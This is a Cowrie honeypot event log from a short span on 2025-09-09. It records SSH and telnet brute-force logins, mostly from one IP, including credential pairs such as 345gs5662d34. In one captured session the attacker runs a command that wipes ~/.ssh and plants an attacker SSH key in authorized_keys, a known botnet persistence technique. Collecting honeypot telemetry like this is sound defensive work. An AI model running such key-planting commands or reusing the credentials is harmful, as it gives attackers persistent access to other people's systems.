{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60130,"dst_ip":"1.2.3.4","dst_port":23,"session":"5a9d36cd17e5","protocol":"telnet","message":"New connection: 212.227.235.229:60130 (1.2.3.4:23) [session: 5a9d36cd17e5]","sensor":"my-vps","timestamp":"2025-09-09T02:34:30.328175Z"}
{"eventid":"cowrie.session.closed","duration":14.09926986694336,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:32.118956Z","src_ip":"212.227.235.229","session":"d12f5d0f1728"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60172,"dst_ip":"1.2.3.4","dst_port":23,"session":"4eaa309e9718","protocol":"telnet","message":"New connection: 212.227.235.229:60172 (1.2.3.4:23) [session: 4eaa309e9718]","sensor":"my-vps","timestamp":"2025-09-09T02:34:32.380634Z"}
{"eventid":"cowrie.session.connect","src_ip":"185.152.45.241","src_port":11779,"dst_ip":"1.2.3.4","dst_port":22,"session":"6af29982ab8d","protocol":"ssh","message":"New connection: 185.152.45.241:11779 (1.2.3.4:22) [session: 6af29982ab8d]","sensor":"my-vps","timestamp":"2025-09-09T02:34:32.635812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:34:32.653967Z","src_ip":"185.152.45.241","session":"6af29982ab8d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:34:32.704499Z","src_ip":"185.152.45.241","session":"6af29982ab8d"}
{"eventid":"cowrie.login.failed","username":"gbase","password":"gbase","message":"login attempt [gbase/gbase] failed","sensor":"my-vps","timestamp":"2025-09-09T02:34:32.959919Z","src_ip":"185.152.45.241","session":"6af29982ab8d"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:34.004822Z","src_ip":"185.152.45.241","session":"6af29982ab8d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43354,"dst_ip":"1.2.3.4","dst_port":22,"session":"fd98a3585607","protocol":"ssh","message":"New connection: 212.227.235.229:43354 (1.2.3.4:22) [session: fd98a3585607]","sensor":"my-vps","timestamp":"2025-09-09T02:34:35.014754Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:34:35.021290Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:34:35.264968Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.session.closed","duration":13.732079982757568,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:36.097828Z","src_ip":"212.227.235.229","session":"d435bb8e0734"}
{"eventid":"cowrie.login.success","username":"root","password":"Ww@123456","message":"login attempt [root/Ww@123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:34:36.250165Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60203,"dst_ip":"1.2.3.4","dst_port":23,"session":"05528b1e47cf","protocol":"telnet","message":"New connection: 212.227.235.229:60203 (1.2.3.4:23) [session: 05528b1e47cf]","sensor":"my-vps","timestamp":"2025-09-09T02:34:36.400901Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:34:36.761486Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:34:36.762228Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:34:36.763203Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:37.012275Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:34:37.598274Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:34:37.598987Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:34:37.851938Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:37.852897Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43970,"dst_ip":"1.2.3.4","dst_port":22,"session":"e35dd3cf7968","protocol":"ssh","message":"New connection: 212.227.235.229:43970 (1.2.3.4:22) [session: e35dd3cf7968]","sensor":"my-vps","timestamp":"2025-09-09T02:34:38.118367Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:34:38.126616Z","src_ip":"212.227.235.229","session":"e35dd3cf7968"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:34:38.385888Z","src_ip":"212.227.235.229","session":"e35dd3cf7968"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:34:39.436255Z","src_ip":"212.227.235.229","session":"e35dd3cf7968"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:40.707887Z","src_ip":"212.227.235.229","session":"e35dd3cf7968"}
{"eventid":"cowrie.session.closed","duration":12.855759143829346,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:40.777015Z","src_ip":"212.227.235.229","session":"fd978467421f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44490,"dst_ip":"1.2.3.4","dst_port":22,"session":"e626a47671b4","protocol":"ssh","message":"New connection: 212.227.235.229:44490 (1.2.3.4:22) [session: e626a47671b4]","sensor":"my-vps","timestamp":"2025-09-09T02:34:40.955179Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:34:40.956084Z","src_ip":"212.227.235.229","session":"e626a47671b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60346,"dst_ip":"1.2.3.4","dst_port":23,"session":"d61d465b85cb","protocol":"telnet","message":"New connection: 212.227.235.229:60346 (1.2.3.4:23) [session: d61d465b85cb]","sensor":"my-vps","timestamp":"2025-09-09T02:34:41.010907Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:34:41.217078Z","src_ip":"212.227.235.229","session":"e626a47671b4"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:34:42.274390Z","src_ip":"212.227.235.229","session":"e626a47671b4"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:42.530001Z","src_ip":"212.227.235.229","session":"fd98a3585607"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:42.533518Z","src_ip":"212.227.235.229","session":"e626a47671b4"}
{"eventid":"cowrie.session.closed","duration":13.566144466400146,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:43.744910Z","src_ip":"212.227.235.229","session":"c1bc79f9ae3e"}
{"eventid":"cowrie.session.closed","duration":13.546799659729004,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:43.874887Z","src_ip":"212.227.235.229","session":"5a9d36cd17e5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60368,"dst_ip":"1.2.3.4","dst_port":23,"session":"3786a4999cec","protocol":"telnet","message":"New connection: 212.227.235.229:60368 (1.2.3.4:23) [session: 3786a4999cec]","sensor":"my-vps","timestamp":"2025-09-09T02:34:44.115120Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60366,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee937f9c98d6","protocol":"telnet","message":"New connection: 212.227.235.229:60366 (1.2.3.4:23) [session: ee937f9c98d6]","sensor":"my-vps","timestamp":"2025-09-09T02:34:44.132626Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60378,"dst_ip":"1.2.3.4","dst_port":23,"session":"d61f9fda3a39","protocol":"telnet","message":"New connection: 212.227.235.229:60378 (1.2.3.4:23) [session: d61f9fda3a39]","sensor":"my-vps","timestamp":"2025-09-09T02:34:46.249041Z"}
{"eventid":"cowrie.session.closed","duration":13.947521209716797,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:46.328080Z","src_ip":"212.227.235.229","session":"4eaa309e9718"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60379,"dst_ip":"1.2.3.4","dst_port":23,"session":"e25e869ec2b6","protocol":"telnet","message":"New connection: 212.227.235.229:60379 (1.2.3.4:23) [session: e25e869ec2b6]","sensor":"my-vps","timestamp":"2025-09-09T02:34:46.692394Z"}
{"eventid":"cowrie.session.connect","src_ip":"179.37.34.219","src_port":57219,"dst_ip":"1.2.3.4","dst_port":23,"session":"e28893ce67b6","protocol":"telnet","message":"New connection: 179.37.34.219:57219 (1.2.3.4:23) [session: e28893ce67b6]","sensor":"my-vps","timestamp":"2025-09-09T02:34:48.685025Z"}
{"eventid":"cowrie.session.closed","duration":13.822048664093018,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:50.222881Z","src_ip":"212.227.235.229","session":"05528b1e47cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60442,"dst_ip":"1.2.3.4","dst_port":23,"session":"ccb9e67af8f6","protocol":"telnet","message":"New connection: 212.227.235.229:60442 (1.2.3.4:23) [session: ccb9e67af8f6]","sensor":"my-vps","timestamp":"2025-09-09T02:34:50.465845Z"}
{"eventid":"cowrie.session.closed","duration":14.30754804611206,"message":"Connection lost after 14 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:55.317457Z","src_ip":"212.227.235.229","session":"d61d465b85cb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60564,"dst_ip":"1.2.3.4","dst_port":23,"session":"4cc21d663a7a","protocol":"telnet","message":"New connection: 212.227.235.229:60564 (1.2.3.4:23) [session: 4cc21d663a7a]","sensor":"my-vps","timestamp":"2025-09-09T02:34:55.541158Z"}
{"eventid":"cowrie.session.closed","duration":12.795092821121216,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:56.927666Z","src_ip":"212.227.235.229","session":"ee937f9c98d6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60577,"dst_ip":"1.2.3.4","dst_port":23,"session":"565b215f02b1","protocol":"telnet","message":"New connection: 212.227.235.229:60577 (1.2.3.4:23) [session: 565b215f02b1]","sensor":"my-vps","timestamp":"2025-09-09T02:34:57.105369Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35358,"dst_ip":"1.2.3.4","dst_port":22,"session":"b883f5c92a1b","protocol":"ssh","message":"New connection: 212.227.235.229:35358 (1.2.3.4:22) [session: b883f5c92a1b]","sensor":"my-vps","timestamp":"2025-09-09T02:34:57.962387Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:34:57.963159Z","src_ip":"212.227.235.229","session":"b883f5c92a1b"}
{"eventid":"cowrie.session.closed","duration":13.954192161560059,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:58.069240Z","src_ip":"212.227.235.229","session":"3786a4999cec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:34:58.236149Z","src_ip":"212.227.235.229","session":"b883f5c92a1b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60582,"dst_ip":"1.2.3.4","dst_port":23,"session":"7393e106a1da","protocol":"telnet","message":"New connection: 212.227.235.229:60582 (1.2.3.4:23) [session: 7393e106a1da]","sensor":"my-vps","timestamp":"2025-09-09T02:34:58.298899Z"}
{"eventid":"cowrie.login.failed","username":"minerstat","password":"Password","message":"login attempt [minerstat/Password] failed","sensor":"my-vps","timestamp":"2025-09-09T02:34:59.369106Z","src_ip":"212.227.235.229","session":"b883f5c92a1b"}
{"eventid":"cowrie.session.closed","duration":13.726868867874146,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:34:59.975843Z","src_ip":"212.227.235.229","session":"d61f9fda3a39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60592,"dst_ip":"1.2.3.4","dst_port":23,"session":"ea14f80493a3","protocol":"telnet","message":"New connection: 212.227.235.229:60592 (1.2.3.4:23) [session: ea14f80493a3]","sensor":"my-vps","timestamp":"2025-09-09T02:35:00.217416Z"}
{"eventid":"cowrie.session.closed","duration":13.615277528762817,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:00.307606Z","src_ip":"212.227.235.229","session":"e25e869ec2b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60601,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca8ffa1a51d9","protocol":"telnet","message":"New connection: 212.227.235.229:60601 (1.2.3.4:23) [session: ca8ffa1a51d9]","sensor":"my-vps","timestamp":"2025-09-09T02:35:00.474921Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:00.643475Z","src_ip":"212.227.235.229","session":"b883f5c92a1b"}
{"eventid":"cowrie.session.closed","duration":13.498732566833496,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:03.964519Z","src_ip":"212.227.235.229","session":"ccb9e67af8f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60751,"dst_ip":"1.2.3.4","dst_port":23,"session":"abe6a20f911f","protocol":"telnet","message":"New connection: 212.227.235.229:60751 (1.2.3.4:23) [session: abe6a20f911f]","sensor":"my-vps","timestamp":"2025-09-09T02:35:04.244951Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52620,"dst_ip":"1.2.3.4","dst_port":22,"session":"e28b8b7c294e","protocol":"ssh","message":"New connection: 212.227.235.229:52620 (1.2.3.4:22) [session: e28b8b7c294e]","sensor":"my-vps","timestamp":"2025-09-09T02:35:05.267420Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:35:05.268537Z","src_ip":"212.227.235.229","session":"e28b8b7c294e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:35:05.660959Z","src_ip":"212.227.235.229","session":"e28b8b7c294e"}
{"eventid":"cowrie.login.failed","username":"doris","password":"doris","message":"login attempt [doris/doris] failed","sensor":"my-vps","timestamp":"2025-09-09T02:35:07.263511Z","src_ip":"212.227.235.229","session":"e28b8b7c294e"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:08.654543Z","src_ip":"212.227.235.229","session":"e28b8b7c294e"}
{"eventid":"cowrie.session.closed","duration":13.449349403381348,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:35:08.990444Z","src_ip":"212.227.235.229","session":"4cc21d663a7a"}
